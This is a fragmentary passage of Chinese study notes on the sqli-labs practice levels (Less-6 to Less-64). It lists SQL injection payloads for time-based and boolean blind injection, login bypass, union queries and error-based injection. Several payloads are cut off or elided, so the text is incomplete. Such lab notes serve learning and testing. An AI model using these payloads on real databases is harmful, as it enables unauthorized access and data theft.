50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1--+
Less-6
没有回显...可以考虑盲注
1') or ascii(substr((database()),1,1))>100#
Less-14
1" or 1=1#
成功登录,依然不能回显,尝试使用布尔盲注
1" or left...admin") and If(ascii(substr(database(),1,1))>115,1,sleep(5))#
Less-17
update注入,username过滤了很多,有password错误回显...id=-1" union select 1,database(),3%23
Less-58
查询之后并没有返回查询数据库当中的数据,不能使用union联合注入,但是有报错回显,可以使用报错注入。...Less-64
这关跟上一关一样,唯一的区别在于需要使用括号闭合
不再赘述!